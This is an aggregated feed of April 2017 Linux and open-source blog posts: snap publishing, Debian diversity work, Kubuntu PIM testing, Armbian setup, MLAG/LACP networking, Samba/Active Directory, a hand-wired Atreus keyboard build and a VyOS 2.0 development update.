Step 2: Register the snap name

Snap names are globally unique, so only one developer can register and publish a snap with a given name. Before you can publish the snap, you need to make sure that snap name is registered to you (note that this corresponds to the name field in the snapcraft.yaml we created a few minutes ago):

$ snapcraft register <my snap name>

Assuming that name is available, you can proceed to upload it.

Step 3: Release the snap

In the tour you learned that there are four channels available by default. In order of increasing stability, these channels are edge, beta, candidate, and stable. This snap isn’t quite perfect yet since it still requires devmode, so let’s release it on the beta channel:

$ snapcraft push path/to/my.snap --release=beta

Once the upload and automated reviews finish successfully, anyone in the world can install your snap on the computer controlling their Turtlebot as simply as:

$ sudo snap install --beta --devmode my-turtlebot-snap

In the next post in this series, we’ll discuss how to obtain real confined access to the Turtlebot’s udev symlink on Ubuntu Core by creating a gadget snap, moving toward our goal of having a final image with this snap pre-installed and ready to ship.

Original source here.

21 April, 2017 09:40AM

Rhonda D'Vine: Home

A fair amount has happened since I last blogged about something other than music. First of all, we did actually hold a Debian Diversity meeting. It was quite nice, with fewer people around than hoped for, and I attribute that to some extent to the trolls and haters that defaced the titanpad page for the agenda and destroyed the doodle entry for settling on a date for the meeting. They even tried to troll my blog with comments, and while I did approve controversial responses in the past, those went over the line of being acceptable and didn't carry any relevant content.

One response that I didn't approve but kept in my mailbox is even giving me strength to carry on. There is one sentence in it that speaks to me: Think you can stop us? You can't you stupid b*tch. You have ruined the Debian community for us. The rest of the message is of no further relevance, but even though I can't take credit for being responsible for that, I'm glad to be a perceived part of ruining the Debian community for intolerant and hateful people.

A lot of other things have happened since, too. Mostly locally here in Vienna: several queer empowering groups were founded around me; some of them existed already, some formed with my help. We now have several great regular meetings for non-binary people, for queer polyamory people about which we gave an interview, a queer playfight (I might explain that concept another time), a polyamory discussion group, two bi-/pansexual groups, a queer-feminist choir, and there will be an European Lesbian* Conference in October where I help with the organization …

… and on June 21st I'll finally receive the keys to my flat in Que[e]rbau Seestadt. I'm sooo looking forward to it. It will be part of the Let me come Home experience that I'm currently in. Another part of that experience is that I started changing my name (and gender marker) officially. I had my first appointment in the corresponding bureau, and I hope that it won't last too long because I have to get my papers in time for booking my flight to Montreal, and somewhen along the process my current passport won't contain correct data anymore. So for the people who have it in their signing policy to see government IDs this might be your chance to finally sign my key then.

I plan to do a diversity BoF at debconf where we can speak more directly on where we want to head with the project. I hope I'll find the time to do an IRC meeting beforehand. I'm just uncertain how to coordinate that one to make it accessible for interested parties while keeping the destructive trolls out. I'm open for ideas here.


21 April, 2017 08:01AM

Kubuntu General News: KDE PIM update for Zesty available for testers

Since we missed getting updated PIM (kontact, kmail, akregator, kgpg, etc.) into Zesty for release day by a whisker, and we believe it is important that our users have access to this significant update, packages are now available for testers in the Kubuntu backports landing PPA.

While we believe these packages should be relatively issue-free, please bear in mind that they have not been tested as comprehensively as those in the main ubuntu archive.

Testers should be prepared to troubleshoot and hopefully report issues that may occur. Please provide feedback on our mailing list [1], IRC [2], or optionally via social media.

After a period of testing and verification, we hope to move this update to the main backports ppa.

You should have some command line knowledge before testing.
Reading about how to use ppa-purge is also advisable.

How to test KDE PIM 16.12.3 for Zesty:

Testing packages are currently in the Kubuntu Backports Landing PPA.

sudo add-apt-repository ppa:kubuntu-ppa/backports-landing
sudo apt-get update
sudo apt-get dist-upgrade

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net

21 April, 2017 01:31AM

April 20, 2017

hackergotchi for ARMBIAN


Orange Pi Win

Ubuntu server – mainline kernel
Command line interface – server usage scenarios.


Ubuntu desktop – mainline kernel
Server and light desktop usage scenarios.


  Other images     Board family info     Forums     HW details     Card burning tool


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert the SD card into a slot and power the board. The first boot takes around 3 minutes; the board might then reboot, and you will need to wait another minute before you can log in. This delay is because the system creates a 128 MB emergency swap and expands the SD card filesystem to its full capacity. After that, a worst-case boot (with DHCP) takes up to 35 seconds.


Log in as root on the HDMI/serial console or via SSH, using the password 1234. You will be prompted to change this password at first login. Next, you will be asked to create a normal, sudo-enabled user account (beware of the default QWERTY keyboard settings at this stage).

20 April, 2017 05:37PM by igorpecovnik

Cumulus Linux

How MLAG interacts with the host: LACP part 2

In part 1, we discussed some of the design decisions around uplink modes for VMware and a customer scenario I was working through recently. In this post, we’ll explore multi-chassis link aggregation (MLAG) in some detail and how active-active network fabrics challenge some of the assumptions made.

Disclaimer: What I’m going to describe is based on network switches running Cumulus Linux and specifically some down-in-the-weeds details on this particular MLAG implementation. That said, most of the concepts apply to similar network technologies (VPC, other MLAG implementations, stacking, virtual-chassis, etc.) as they operate in very similar ways. But YMMV.

I originally set out to write this as a single article, but to explain the nuances it quickly spiraled beyond that. So I decided to split it up into a few parts.

So let’s explore MLAG in some detail

If the host is connected to two redundant switches (which these days is all but assumed), then MLAG (and equivalent solutions) is a commonly deployed option. In simple terms, the independent switches act as a single logical switch, which allows them to do somewhat unnatural things — like form a bond/port-channel/ LAG to a destination from 2 physically separate switches.

That bond is often the uplink up to an aggregation layer (also commonly an MLAG pair). The big advantage is utilizing all your uplink bandwidth, instead of having half blocked by spanning-tree. Bonds can also be formed to the hosts; with or without LACP.


Figure 1a: 2-Tier MLAG

Another common deployment is to use MLAG purely at the top-of-rack and route above that layer. With NSX becoming more common, this deployment is getting more popular. I covered one of the other caveats previously in “Routed vMotion: why”. That caveat has since been resolved in vSphere 6. So one less reason not to move to an L3 Clos fabric.


Figure 1a: MLAG ToRs + L3 Uplink

In this particular case, the design was a proof-of-concept, so it was just a pair of switches for now, with an uplink up to a router/firewall device.

The thing that the above designs have in common is the northbound fabric is natively Active-Active and traffic is hashed across all links, either with an L2 bond (normally LACP) or Equal-Cost-Multi-Pathing (ECMP). This has impacts on the design choice for host connectivity due to the way traffic is forwarded.

So let’s dive a little deeper on how MLAG actually forms a bond across 2 switches.

Figure 2a: MLAG + LACP Basic overview

A single-port bond is defined on both switches and assigned an ID to indicate to the MLAG processes/daemons that these ports connect to the same host, which marks it as “dual-connected”. The same is done for any northbound links; normally they are added to a bond named “uplink” or something similar. In the uplink scenario (figure 1a) the bond is actually a 4-way bond (2 links from each ToR up to both aggregation switches, which are also acting as a single MLAG pair).

The definition of a bond states that the member interfaces should be treated as a single logical interface. This influences how learned MAC addresses on the interfaces are treated and also how STP will treat the member ports (i.e. leaving them all active). In practice, MLAG must share locally learned MACs with its peer, and the peer will program those same MACs onto the dual-connected member ports.

Those bonds are then added as members of a bridge, which allows traffic forwarding between the ports at L2.

Host ports can also be attached straight to the bridge, without the bond defined at all. In this configuration, each host port is treated as a single-attached edge port. If there are multiple bridge ports connected to a single host, the switches are completely oblivious to this fact. In networking circles, this is often referred to as an “orphan port”.

Figure 2b: MLAG w/o LACP (Orphan ports)

Let’s now look at how traffic flows in an MLAG environment, both with the host-facing bonds configured and not.

For the example, let’s consider a simple design of 2 top-of-rack switches, 2 hosts each with 4 VMs.


Figure 3a: MLAG w/ LACP

So when the first packet is sent from VM1 to VM8, the LACP driver will determine which uplink to use based on a hashing algorithm. Initially, I’m showing traffic egressing using NIC1, but that is entirely arbitrary. When the packet hits the switch, a few things happen almost immediately:

  1. Switch1: The source MAC ending “A1:A1” on the frame is learned on the bond “host1”.
  2. Switch1: Frame is sent to the bridge. Since the destination MAC is not known, it is flooded out all ports.
  3. Switch2: Frame received across the ISL; since no single-attached hosts are present on the bridge, the frame is ignored and dropped.
  4. Switch1: The MLAG daemon is notified of a new learned MAC on a dual-connected host. So it forwards this information to the MLAG daemon on switch2.
  5. Switch2: The MLAG daemon receives the new MAC notification and programs the MAC onto the bond “host1”.

The frame is sent to ESX2 from Switch1 during the flood operation and sent to VM8 by ESX2 vSwitch.
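The learn/flood/sync sequence above can be condensed into a toy model (class names, bond names, and MAC strings are all invented for illustration; a real MLAG daemon programs bridge forwarding entries in the kernel, not Python dicts):

```python
# Toy model of the MLAG learn/flood sequence described above.
# All names (Switch, "host1"/"host2" bonds) are illustrative.

class Switch:
    def __init__(self, name, peer=None):
        self.name = name
        self.mac_table = {}   # MAC -> local bond/port name
        self.peer = peer      # the MLAG peer switch

    def receive(self, src_mac, dst_mac, in_port, dual_connected=True):
        """Handle one frame: learn the source MAC, then forward."""
        # Step 1: learn the source MAC on the ingress bond
        newly_learned = src_mac not in self.mac_table
        self.mac_table[src_mac] = in_port
        # Steps 4-5: notify the MLAG peer, which programs the same MAC
        # onto its own member of the dual-connected bond
        if newly_learned and dual_connected and self.peer:
            self.peer.mac_table[src_mac] = in_port
        # Step 2: known unicast goes out one port, unknown floods
        if dst_mac in self.mac_table:
            return [self.mac_table[dst_mac]]
        return ["<flood all ports>"]

sw1 = Switch("switch1")
sw2 = Switch("switch2", peer=sw1)
sw1.peer = sw2

# VM1 (MAC ...A1:A1 behind bond "host1") sends to unknown VM8: flooded
out = sw1.receive("A1:A1", "B4:B4", in_port="host1")
assert out == ["<flood all ports>"]
# The peer learned "A1:A1" on its own "host1" bond member
assert sw2.mac_table["A1:A1"] == "host1"

# Reply from VM8 arriving on switch2 is already known unicast:
# no flood, no extra hop over the ISL
out = sw2.receive("B4:B4", "A1:A1", in_port="host2")
assert out == ["host1"]
```

Note how the reply on switch2 goes straight out the local bond: only the initial unknown-unicast frame was flooded.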


Figure 3b: MLAG w/ LACP: Reply traffic flow

Now let’s consider the reply path from VM8 to VM1. Again the LACP bonding driver will make a hashing decision, let’s assume it selects NIC2. Again, a bunch of processes occur at switch2 almost instantly.

  1. Switch2: The source MAC ending “B4:B4” on the frame is learned on the bond “host2”
  2. Switch2: Frame is sent to the bridge. Destination MAC is known via interface “host1”. Frame is sent via port “Host1”
  3. Switch2: The MLAG daemon is notified of a new learned MAC on a dual-connected host. So it forwards this information to the MLAG daemon on switch1.
  4. Switch1: The MLAG daemon receives the new MAC notification and programs the MAC onto the bond “host2”

Notice the only packet to cross the ISL is the initial flooded packet. This packet doesn’t end up utilizing unnecessary uplink bandwidth or get forwarded to the host across both links, due to some forwarding rules enforced by MLAG. File this one under #DarkMagic for now, but it’s one of the traffic optimizations that can be done if the network devices know about topology information, in this case if a host is dual-connected or not.


Figure 3c: All hosts sending traffic (after initial learning).

After the initial flow, let’s consider a more real-world scenario of all VMs communicating with each other. I’m simplifying a little by assuming the initial flood + learn has already occurred.

Aside from a fairly messy diagram, you can see that the traffic flow is optimal from the network switch perspective. Since MACs are known on both sides of the MLAG pair, the switches can use the directly connected link to each host and avoid an extra hop over the ISL.

From the host perspective, this does mean that the traffic flow is asymmetric; traffic sent from nic1 could receive a reply on nic2. This is caused by the path selection at the destination being completely independent of the source hash selection. But I would submit this fundamentally does not matter, since nic1 and nic2 are treated as a single logical uplink group.

It’s worth noting that this traffic flow is fundamentally identical if you used “static bonds” at the switch and “route based on IP Hash” at the host. But you still lose the bi-directional sync of topology change data described in Part 3, “Ships in the night”. Lack of topology information transfer can cause problems if the topology changes, which I’ll also explain in Part 3 (spoiler: it’s the reason the conversation triggering this blog occurred in the first place).

Traffic flow with “orphan ports”

Now let’s consider the alternative: host-facing ports configured as regular switch-ports (ie not ‘dual connected’ from MLAG’s perspective).

Firstly, there’s one thing to get your head around: VMware networking is active-passive by default. For a given MAC / virtual port on a vSwitch, traffic will be pinned to a single uplink port / physical NIC. LACP and “route based on IP hash” are the exceptions to this rule. This is important as it impacts how MAC learning is performed in the ToR switches. Even Load-Based Teaming is active-passive; it just migrates MACs/virtual ports to balance egress traffic and assumes the upstream switches take care of the rest.
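The distinction can be sketched in a few lines (illustrative only: crc32 is a stand-in hash, and VMware's real teaming policies hash different fields depending on the mode):

```python
import zlib

NICS = ["nic1", "nic2"]

def pinned_uplink(vm_mac: str) -> str:
    # Active-passive style: a given MAC / virtual port always maps to
    # the same physical NIC until the vSwitch migrates it.
    return NICS[zlib.crc32(vm_mac.encode()) % len(NICS)]

def hashed_uplink(src_ip: str, dst_ip: str) -> str:
    # LACP / "route based on IP hash" style: the uplink is chosen per
    # flow, so different flows from one VM can use different NICs.
    return NICS[zlib.crc32(f"{src_ip}->{dst_ip}".encode()) % len(NICS)]

# The pinned choice is stable for a given virtual port...
assert pinned_uplink("00:50:56:a1:a1:a1") == pinned_uplink("00:50:56:a1:a1:a1")
# ...while the hashed choice depends on the flow, not the VM.
assert hashed_uplink("10.0.0.1", "10.0.0.8") in NICS
```

Either way, the upstream switches only see which physical port a MAC last appeared on, which is what drives the learning behavior described next.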

Figure 4a: MLAG w/o LACP

As with the previous example, let’s walk through the traffic flow, starting with the first packet from a given MAC.

This time, traffic from a given MAC is pinned to a particular uplink. VM1 is sending via uplink1. As before, the traffic hits Switch1 and a bunch of things happen at once:

  1. Switch1: MAC ending A1A1 is learned on port1
  2. Switch1: Frame is sent to the bridge. Destination MAC is unknown, so it floods out all ports (except the one it was received on).
  3. Switch1: MLAG daemon is notified of a new MAC on an orphan port, so forwards this info to MLAG daemon on switch2.
  4. Switch2: The MLAG daemon receives orphan-port information, programs the MAC onto the ISL.
  5. Switch2: Frame received on ISL. Sent to bridge and flooded out all orphan ports.

The frame will be received twice by ESX2 and once by ESX1. Two frames will be forwarded to the VM (a duplicate packet), and the frame will be dropped at ESX1, since the destination MAC is not present on that vSwitch. Not exactly an ideal forwarding situation, and it will happen for every BUM packet. Also note that in this case VM1’s MAC ending A1A1 is learned via the ISL; let’s now see how the reply will flow.


Figure 4b: MLAG without Bonds; Reply traffic flow

In this example, VM8 is pinned to NIC2, so its reply will hit switch2 first. Then the following happens:

  1. Switch2: MAC ending B4B4 is learned on port16.
  2. Switch2: Frame is sent to the bridge. Destination MAC ending A1A1 is known via ISL, frame is forwarded via ISL.
  3. Switch2: MLAG daemon is notified of a new MAC on an orphan port, so forwards this info to MLAG daemon on switch1.
  4. Switch1: The MLAG daemon receives orphan-port information, programs the MAC onto the ISL.
  5. Switch1: Frame received on ISL. Sent to bridge, MAC ending A1A1 known via port1, forwarded to ESX1 via port1.

So let’s recap: duplicate packets (due to standard ethernet flood+learn behavior), traffic utilizing ISL when a direct path exists and traffic sent over all host-facing links needlessly.


Figure 4c: MLAG without bonds; Full traffic example

Let’s see how this expands out with the same scaled-out example as before; all VMs sending to each other.

  • All VMs pinned to uplink1 (VM1, VM2, VM5 and VM6) will cause those destination MACs to be learned via Switch1.
  • All VMs pinned to uplink2 (VM3, VM4, VM7 and VM8) will cause those destination MACs to be learned via Switch2.

Regardless of which link a frame is received on, it must go to the switch where the destination MAC is known. So, statistically, approximately 50% of all traffic will go via the ISL. That’s a design consideration worth noting. Figure 4c only shows half the flows to simplify the diagram a little.

Consider a rack with 20 ESXi hosts with dual 10G uplinks configured in this way: the ISL could see up to 200 Gbit/s of bandwidth crossing it, and burning 5x 40G interfaces is a pretty expensive way to work around a design problem. Realistically, that scenario is not likely to occur often, unless a broken link is left unfixed.
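The back-of-the-envelope math behind those numbers:

```python
# Worst-case ISL load for a rack of orphan-port-connected hosts.
hosts = 20
uplinks_per_host = 2
uplink_gbit = 10

# Total host-facing bandwidth in the rack
total_gbit = hosts * uplinks_per_host * uplink_gbit   # 400 Gbit/s

# With orphan ports, MACs are split across the MLAG pair, so
# statistically about half of all traffic must cross the ISL to
# reach the switch where the destination MAC was learned.
isl_worst_case = total_gbit * 0.5                     # 200 Gbit/s

# 40G interfaces needed on the peer link to carry that
links_40g = isl_worst_case / 40                       # 5 links

assert total_gbit == 400
assert isl_worst_case == 200
assert links_40g == 5
```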

However, this behavior is more likely to occur during burst events; in such cases the problem will normally manifest as a transient egress buffer queue drop on the ISL interface, or sometimes an ingress queue drop, depending on which underlying ASIC is used in the switch.

Suffice to say, this is typically very difficult to troubleshoot effectively (likely a cross-functional finger pointing exercise).

All of that said, this design does have a couple of things going for it:

  • The host config is relatively simple to understand
  • A combination of any of the active-passive and static-assignment modes described in part 1 can be used on the hosts (potentially a few at once, for different traffic types).
  • Symmetric traffic flow
  • If the host networking configuration is changed at any time in the future, the switches will dynamically learn about it by a MAC-move.

That last point is one to keep in mind as we go to the next (and final) article, Part 3 – Ships in the night.

The post How MLAG interacts with the host: LACP part 2 appeared first on Cumulus Networks Blog.

20 April, 2017 03:16PM by Doug Youd

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Podcast from the UK LoCo: S10E07 – Black Frail Silver - Ubuntu Podcast

We spend some time discussing one rather important topic in the news and that’s the announcement of Ubuntu’s re-focus from mobile and convergence to the cloud and Internet of Things.

It’s Season Ten Episode Seven of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

20 April, 2017 02:00PM

Colin King: Tracking CoverityScan issues on Linux-next

Over the past 6 months I've been running static analysis on linux-next with CoverityScan on a regular basis (to find new issues and fix some of them) as well as keeping a record of the defect count.

Since the beginning of September over 2000 defects have been eliminated by a host of upstream developers and the steady downward trend of outstanding issues is good to see.  A proportion of the outstanding defects are false positives or issues where the code is being overly zealous, for example, bounds checking where some conditions can never happen. Considering there are millions of lines of code, the defect rate is about average for such a large project.

I plan to keep the static analysis running long term and I'll try and post stats every 6 months or so to see how things are progressing.

20 April, 2017 12:47PM by Colin Ian King (noreply@blogger.com)

Ubuntu Insights: Certified Ubuntu Images available on Oracle Bare Metal Cloud Service

  • Developers are offered options of where to run demanding workloads or less compute-intensive applications in a highly available cloud environment.
  • Running development and production on Certified Ubuntu can simplify operations and reduce engineering costs

Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates.

“Oracle and Canonical have collaborated to ensure the optimal devops experience using Ubuntu on the Oracle Compute Cloud Service and Bare Metal Cloud Services. By combining the elasticity and ease of deployment on Oracle Cloud Platform, users can immediately reap the benefit of high-performance, high availability and cost-effective infrastructure services,” says Sanjay Sinha, Vice President, Platform Products, Oracle.

“Ubuntu has been growing on Oracle’s Compute Cloud Service, and the same great experience is now available to Enterprise Developers on its Bare Metal Cloud Services,” said Udi Nachmany, Head of Public Cloud at Canonical. “Canonical and Oracle engineering teams will continue to collaborate extensively to deliver a consistent and optimized Ubuntu experience across any relevant Oracle offerings.”

Canonical continually maintains, tests and updates certified Ubuntu images, making the latest versions available on the Oracle Cloud Marketplace within minutes of their official release by Canonical. For all Ubuntu LTS versions, Canonical provides maintenance and security updates for five years.

20 April, 2017 09:02AM

hackergotchi for Univention Corporate Server

Univention Corporate Server

Brief Introduction: Samba / Microsoft Active Directory

In the latest article from our ‘Brief Introduction’ series, we would like to introduce you to the software Samba and Microsoft Active Directory – two solutions for the central authentication and authorization of members of a domain. These are very important features, as the central administration of a domain network helps to achieve more data protection and higher reliability for your IT systems.

We would also like to briefly show you how UCS is able to bridge the gap between the Linux world and the Windows world so that the benefits of both systems can be utilized.

For more information on exactly what a domain is and what tasks a domain controller fulfills, please check our article: Brief Introduction: Domain/Domain Controller

Now let’s go back to the actual topic of this article: the directory service solution Active Directory and the software Samba.


What Exactly is Active Directory and What is it used for?

Active Directory is a solution developed by Microsoft to provide authentication and authorization services in a domain network.

Core Elements of Active Directory

The Active Directory core elements are an LDAP directory service, a Kerberos implementation, and DNS services. Information on users, groups, and hosts is stored in the directory service. Kerberos handles the authentication of these users and hosts, and DNS (Domain Name System) ensures that client and server systems in the domain network can find and communicate with each other.

These three components, LDAP, Kerberos, and DNS, are closely interrelated; grouped into a single entity, they are called the Active Directory Domain Services (AD DS).

As a so-called domain controller, Microsoft Windows Server can provide these Active Directory domain services or join such a domain as a simple member. Windows client operating systems can also join such a domain (this applies to the respective business and education versions).

Resource Allocation and Failure Safety

The contents of the directory service are replicated between the domain controllers of a domain, making them available on multiple systems. This contributes significantly to the reliability and load distribution of the resources of the domain network. Active Directory here uses so-called multi-master replication: changes can be made on each individual domain controller and are automatically transferred from there to the other domain controllers.


The Samba project provides a free software suite that enables the interoperability of Linux and Unix-based systems with services and protocols used and developed by Microsoft.

Provision of Windows-Compatible Services

At first, Samba offered the possibility to use file sharing and print services via the SMB / CIFS protocol used and shaped by Microsoft. This applies both to a server implementation, where Samba provides the services on Linux or Unix, and to a client implementation that allows Linux and Unix systems to use the services provided by Microsoft Windows.

By the way, the name “Samba” was derived from the protocol name ‘SMB’.

Interoperability through Integrated Services and Protocols

Meanwhile Samba has implemented a variety of services and protocols, including SMB / CIFS, NTLM, WINS / NetBIOS, (MS) RPC, SPOOLSS, DFS, SAM, LSA, and the Windows NT domain model. With version 4.0, Samba was supplemented by an open source implementation of Active Directory.

Samba as an Active Directory Domain Controller

Since then, Samba systems can not only join as members of an Active Directory domain, but also take the role of the domain controller and deploy the Active Directory domain services on a Linux or Unix-based system.

Client systems, such as Windows or Mac OS, can join an Active Directory domain provided by Samba by the same mechanism as a Microsoft Windows Active Directory domain. In addition, group policies can also be used to manage Windows clients.

The Interplay between Samba and UCS

In general, OpenLDAP is the directory service in UCS and the core element that must exist in each UCS domain.

Build a Bridge between the Windows and Linux / Unix World with UCS and Samba


With the app Active Directory-compatible Domain Controller from the Univention App Center, UCS also offers the possibility to run an Active Directory domain via the Samba software suite.

The Univention S4-Connector developed by us synchronizes all relevant information between the OpenLDAP directory service and the Samba directory service. This interaction makes UCS ideal for unifying the Windows and Linux / Unix worlds in a single domain network.

The Federal Office for Radiation Protection in Germany, for example, has been using UCS and Samba for years to fully benefit from the advantages of the Linux servers used while the institute’s employees can work with Windows services and clients at their various sites.

We hope to have given you a good insight into the tasks of the directory service solutions Samba and Microsoft Active Directory. If you want to know more about how you can easily combine Microsoft and Linux-based applications in your IT environment with UCS and Samba, please contact us.

To give you further insights into this topic, we recommend the following articles or video tutorials:

The post Brief Introduction: Samba / Microsoft Active Directory appeared first on Univention.

20 April, 2017 08:59AM by Michael Grandjean

hackergotchi for Maemo developers

Maemo developers

Atreus: Building a custom ergonomic keyboard

As mentioned in my Working on Android post, I’ve been using a mechanical keyboard for a couple of years now. Now that I work on Flowhub from home, it was a good time to re-evaluate the whole work setup. As far as regular keyboards go, the MiniLa was nice, but I wanted something more compact and ergonomic.

The Atreus keyboard

My new Atreus

Atreus is a 40% ergonomic mechanical keyboard designed by Phil Hagelberg. It is an open hardware design, but he also sells kits for easier construction. From the kit introduction:

The Atreus is a small mechanical keyboard that is based around the shape of the human hand. It combines the comfort of a split ergonomic keyboard with the crisp key action of mechanical switches, all while fitting into a tiny profile.

My use case was also quite travel-oriented. I wanted a small keyboard that would enable me to work with it also on the road. There are many other small-ish DIY keyboard designs like Planck and Gherkin available, but Atreus had the advantage of better ergonomics. I really liked the design of the Ergodox keyboard, and Atreus essentially is that made mobile:

I found the split halves and relatively large size (which are fantastic for stationary use at a desk) make me reluctant to use it on the lap, at a coffee shop, or on the couch, so that’s the primary use case I’ve targeted with the Atreus. It still has most of the other characteristics that make the Ergodox stand out, like mechanical Cherry switches, staggered columns instead of rows, heavy usage of the thumbs, and a hackable microcontroller with flexible firmware, but it’s dramatically smaller and lighter

I had the opportunity to try a kit-built Atreus in the Berlin Mechanical Keyboard meetup, and it felt nice. It was time to start the project.

Sourcing the parts

When building an Atreus the first decision is whether to go with the kit or hand-wire it yourself. Building from a kit is certainly easier, but since I’m a member of a hackerspace, doing a hand-wired build seemed like the way to go.

To build a custom keyboard, you need:

  • Switches: in my case 37 Cherry MX blues and 5 Cherry MX blacks
  • Diodes: one 1N4148 per switch
  • Microcontroller: an Arduino Pro Micro in my keyboard
  • Keycaps: started with recycled ones and later upgraded to DSA blanks
  • Case: got a set of laser-cut steel plates

Even though Cherry — the maker of the most common mechanical key switches — is a German company, it is quite difficult to get switches in retail here. Luckily a fellow hackerspace member had just dismantled some old mechanical keyboards, and so I was able to get the switches I needed via barter.


The Cherry MX blues are tactile clicky switches that feel super-nice to type on, but are quite loud. For modifiers I went with Cherry MX blacks that are linear. This way there is quite a clear difference in feel between keys you typically hold down compared to the ones you just press.

The diodes and the microcontroller I ordered from Amazon for about 20€ total.

Arduino Pro Micro

At first I used a set of old keycaps that I got with the switches, but once the keyboard was up and running I upgraded to a very nice set of blank DSA-profile keycaps that I ordered from AliExpress for 30€. That set came with enough keycaps that I’ll have myself covered if I ever build a second Atreus.

All put together, I think the parts ended up costing me around 100€ total.


When I received all the parts, there were some preparation steps to be made. Since the key switches were 2nd hand, I had to start by dismantling them and removing old diodes that had been left inside some of them.

Opening the key switches

The keycaps I had gotten with the switches were super grimy, and so I ended up sending them to the washing machine. After that you could see that they were not new, but at least they were clean.

With the steel mounting plate there had been a slight misunderstanding, and the plates I received were a few millimeters thicker than needed, so the switches wouldn’t “click” into place. While this could’ve been worked around with hot glue, we ended up filing the mounting holes down to the right thickness.

Filing the plate

Little bit of help

Wiring the keyboard

Once the mounting plate was in the right shape, I clicked the switches in and it was time to solder.

All switches in place

Hand-wiring keyboards is not that tricky. You have to attach a diode to each keyswitch, and then connect each row together via the diodes.

Connecting diodes

First row ready

The two thumb keys are wired to be on the same column, but different rows.

All rows ready diodes

Then each column is connected together via the other pin on the switches.

Soldering columns

This is how the matrix looks like:

Completed matrix

After these are done, connect a wire from each column and each row to an I/O pin on the microcontroller.

Adding column wires

If you haven’t done it earlier, this is a good stage to test all connections with a multimeter!
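For the curious, the firmware reads this diode matrix by scanning: drive one column at a time and check which rows show a connection. QMK implements this in C against the GPIO pins; here is a language-agnostic sketch of the idea (the read_pin callback is a stand-in for real GPIO reads, and the dimensions are just the Atreus wiring matrix):

```python
# Illustrative matrix scan, not QMK code: a pressed key connects its
# row and column, and the per-switch diode keeps current flowing one
# way so simultaneous keypresses don't "ghost" onto other positions.

ROWS, COLS = 4, 11  # the Atreus hand-wiring uses a 4x11 matrix

def scan(read_pin):
    """Return the set of (row, col) positions currently pressed.

    read_pin(row, col) stands in for: drive column `col`, read row
    `row`, and report whether the circuit is closed.
    """
    pressed = set()
    for col in range(COLS):
        for row in range(ROWS):
            if read_pin(row, col):
                pressed.add((row, col))
    return pressed

# Simulated hardware state: two keys held down
held = {(0, 0), (2, 5)}
assert scan(lambda r, c: (r, c) in held) == {(0, 0), (2, 5)}
```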

Connecting the microcontroller


After finishing the wiring, I downloaded the QMK firmware, changed the PIN mapping for how my Atreus is wired up, switched the layout to Colemak, and the keyboard was ready to go.

Atreus in use

Don’t mind the key labels in the picture above. These are the second-hand keycaps I started with. Since then I’ve switched to blank ones.


The default Atreus design has the USB cable connected directly to the microcontroller, meaning that you’ll have to open the case to change the cable. To mitigate that I wanted to add a USB breakout board to the project, and this being 2017, it felt right to go with USB-C.

USB-C breakouts

I found some cheap USB-C breakout boards from AliExpress. Once they arrived, it was time to figure out how the spec works. Since USB-C is quite new, there are very few resources available on how to use it with microcontrollers. These tutorials were quite helpful:

Here is how we ended up wiring the breakout board. After these you only have four wires to connect to the microcontroller: ground, power, and the positive and negative data pins.

USB-C breakout with wiring

This Atreus build log was useful for figuring out where to connect the USB wires on the Pro Micro. Once all was done, I had a custom, USB-C keyboard!

USB-C keyboard

Next steps

Now I have the Atreus working nicely on my new standing desk. Learning Colemak is a bit painful, but the keyboard itself feels super nice!

New standing desk

However, I’d still like to CNC mill a proper wooden case for the keyboard. I may update this post once that happens.

I’m also considering ordering an Atreus kit so I’d have a second keyboard that’s always packed for travel. The kit comes with a PCB, which might work better at airport security checks than the hand-wired build.

Another thing that is quite tempting is to make a custom firmware with MicroFlo. I have no complaints about how QMK works, but it’d be super-cool to use our visual programming tool to tweak the keyboard live.

Big thanks to Technomancy for the Atreus design, and to XenGi for all the help during the build!


20 April, 2017 12:00AM by Henri Bergius (henri.bergius@iki.fi)

April 19, 2017

hackergotchi for VyOS


VyOS 2.0 development digest #9: socket communication functionality, complete parser, and open tasks

Socket communication

A long-awaited (by me, anyway ;) milestone: VyConf is now capable of communicating with clients. This allows us to write a simple non-interactive client. Right now the only supported operation is "status" (a keepalive of sorts), but the list will be growing.

I guess I should talk about the client before going into technical details of the protocol. The client will be way easier to use than what we have now. The two main problems with the CLI tools from VyOS 1.x are that my_cli_bin (the command used by set/delete operations) requires a lot of environment setup, and that cli-shell-api is limited in scope. Part of the reason for this is that my_cli_bin is used in the interactive shell. Since the interactive shell of VyConf will be a standalone program rather than a bash completion hack, we are free to make the non-interactive client more idiomatic as a shell command, closer in user experience to git or s3cmd.

This is what it will look like:

SESSION=$(vycli setupSession)
vycli --session=$SESSION configure
vycli --session=$SESSION set "system host-name vyos"
vycli --session=$SESSION delete "system name-server"
vycli --session=$SESSION commit
vycli --session=$SESSION exists "service dhcp-server"
vycli --session=$SESSION returnValue "system host-name"
vycli --session=$SESSION --format=json show "interfaces ethernet"

As you can see, first, the top-level words are subcommands, much like "git branch". Since the set of top-level words is fixed anyway, this doesn't create new limitations. Second, the same client can execute both high-level set/delete/commit operations and low-level exists/returnValue/etc. methods. Third, the only thing it needs to operate is a session token (I'm thinking that unless it's passed in the --session option, vycli should try to get it from an environment variable, but we'll see; let me know what you think about this issue). This way contributors will get an easy way to test the code even before the interactive shell is complete; and when VyOS 2.0 is usable, shell scripts and people fond of working from bash rather than the domain-specific shell will have access to all system functions, without worrying about intricate environment variable setup.

The protocol

